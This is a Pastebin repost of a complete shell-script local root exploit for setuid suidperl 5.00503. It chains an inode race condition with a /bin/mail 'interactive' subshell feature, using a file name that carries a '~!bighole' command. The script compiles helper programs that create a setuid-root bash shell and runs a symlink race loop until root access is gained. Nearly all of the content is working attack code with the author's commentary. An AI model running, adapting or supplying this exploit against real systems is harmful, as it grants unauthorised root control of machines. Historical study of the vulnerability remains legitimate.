Advertisement
FlyFar

Exploit.Unix.Local.f/Suidperl 5.00503 - Root Exploit

Jul 8th, 2023
773
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 4.66 KB | Cybersecurity | 0 0
  1. #!/bin/sh
  2.  
  3. #
  4. #    -- PLEASE READ THESE COMMENTS CAREFULLY BEFORE TRYING ANYTHING --
  5. #
  6. # Wonderful, lovely, world-smashing, exciting perl exploit. It works against
  7. # +s suidperl, exploiting undocumented /bin/mail feature when perl wants to
  8. # notify root on inode race conditions. Currently, tested under RH Linux.
  9. #
  10. # What's probably most shocking, buggy code has following comment inside:
  11. # /* heh, heh */. I guess author wasn't laughning last.
  12. #
  13. # Development history of this exploit is really funny. I found this condition
  14. # about 4 months ago, but thought it's useless (who wants to notify root?).
  15. # I deleted my test code and didn't left any notes on it. Then, month after
  16. # this discovery, Sebastian contacted me. He was working on perl exploit.
  17. # He told me he don't know how to cause this condition to happen, but
  18. # if he realise how he can do it, he'll be able to use undocumented /bin/mail
  19. # feature - environmental variable 'interactive', which, if set, causes
  20. # /bin/mail to interpret ~! commands (subshell requests) even if stdin is not
  21. # on terminal. And then I understood what I've done. I spent next month
  22. # (yes! no kidding!) trying to recall what the fsck was the condition. I
  23. # remembered it was trivial, even annoying... And finally, now I'm able to
  24. # reconstruct it.
  25. #
  26. # This exploit tries to fit in rather short, but reasonable time window in
  27. # order to exploit it. I tested it on fast, not overloaded Linux box, and
  28. # I guess on slow machines it needs tunning. It needs anything setuid
  29. # (/usr/bin/passwd is just fine), writable working directory and something
  30. # around 4 minutes. Working directory should be mounted without noexec or
  31. # nosuid options (if so, find something like /var/lib/svgalib etc).
  32. #
  33. # WARNING: On slow machines, it's quite possible this exploit will cause
  34. # heavy load. Please test it when system is not overloaded and not used
  35. # (eg. at night).
  36. #
  37. #
  38. # I'd like to thank Sebastian Krahmer for his help (in fact, HE discovered it
  39. # - I think I can say it without shame), and especially thank to several of
  40. # my braincells that survived monitor radiation and made me recall this
  41. # race condition.
  42. #
  43. # Send comments, ideas and flames to <lcamtuf@ids.pl>
  44. # Tested with sperl 5.00503, but should work with any other as well.
  45. #
  46. # Good luck and don't abuse it.
  47. #
  48.  
  49. clear
  50.  
  51. echo "Suidperl 5.00503 (and newer) root exploit"
  52. echo "-----------------------------------------"
  53. echo "Written by Michal Zalewski <lcamtuf@dione.ids.pl>"
  54. echo "With great respect to Sebastian Krahmer..."
  55. echo
  56.  
  57. SUIDPERL=/usr/bin/suidperl
  58. SUIDBIN=/usr/bin/passwd
  59.  
  60. echo "[*] Using suidperl=$SUIDPERL, suidbin=$SUIDBIN..."
  61.  
  62. if [ ! -u $SUIDPERL ]; then
  63.   echo "[-] Sorry, $SUIDPERL4 is NOT setuid on this system or"
  64.   echo "    does not exist at all. If there's +s perl binary available,"
  65.   echo "    please change SUIDPERL variable within exploit code."
  66.   echo
  67.   exit 0
  68. fi
  69.  
  70.  
  71. if [ ! -u $SUIDBIN ]; then
  72.   echo "[-] Sorry, $SUIDBIN is NOT setuid on this system or does not exist at"
  73.   echo "    all. Please pick any other +s binary and change SUIDBIN variable"
  74.   echo "    within exploit code."
  75.   echo
  76.   exit 0
  77. fi
  78.  
  79. echo "[+] Checks passed, compiling flares and helper applications..."
  80. echo
  81.  
  82. cat >flare <<__eof__
  83. #!/usr/bin/suidperl
  84.  
  85. print "Nothing can stop me now...\n";
  86.  
  87. __eof__
  88.  
  89. cat >bighole.c <<__eof__
  90. main() {
  91.   setuid(0);
  92.   setgid(0);
  93.   chown("sush",0,0);
  94.   chmod("sush",04755);
  95. }
  96. __eof__
  97.  
  98. cat >sush.c <<__eof__
  99. main() {
  100.   setuid(0);
  101.   setgid(0);
  102.   system("/bin/bash");
  103. }
  104. __eof__
  105.  
  106. make bighole sush
  107.  
  108. echo
  109.  
  110. if [ ! -x ./sush ]; then
  111.   echo "[-] Oops, seems to me I cannot compile helper applications. Either"
  112.   echo "    you don't have working 'make' or 'gcc' utility. If possible,"
  113.   echo "    please compile bighole.c and sush.c manually (to bighole and sush)."
  114.   echo
  115.   exit 0
  116. fi
  117.  
  118. echo "[+] Setting up environment..."
  119.  
  120. chmod 4755 ./flare
  121.  
  122. FILENAME='none
  123.  
  124. ~!bighole
  125.  
  126. '
  127. export interactive=1
  128. PATH=.:$PATH
  129.  
  130. echo "[+] Starting exploit. It could take up to 5 minutes in order to get"
  131. echo "[+] working root shell. WARNING - WARNING - WARNING: it could cause"
  132. echo "[+] heavy system load."
  133.  
  134. while :; do
  135.   ( ln -f -s $SUIDBIN "$FILENAME";usleep $RANDOM; nice -n +20 $SUIDPERL ./"$FILENAME" <./flare & ) &>/dev/null &
  136.   ( usleep $RANDOM ; ln -f -s /dev/stdin "$FILENAME" ) &>/dev/null &
  137.   if [ -u ./sush ]; then
  138.     echo
  139.     echo "[+] VOILA, BABE :-) Entering rootshell..."
  140.     echo
  141.     rm -f "$FILENAME" sush.c bighole bighole.c flare
  142.     ./sush
  143.     echo
  144.     echo "[+] Thank you for using Marchew Industries / dupa.ryba products."
  145.     echo
  146.     rm -f "$FILENAME" sush.c bighole bighole.c flare sush
  147.     exit 0
  148.   fi
  149. done
Tags: Exploit unix
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement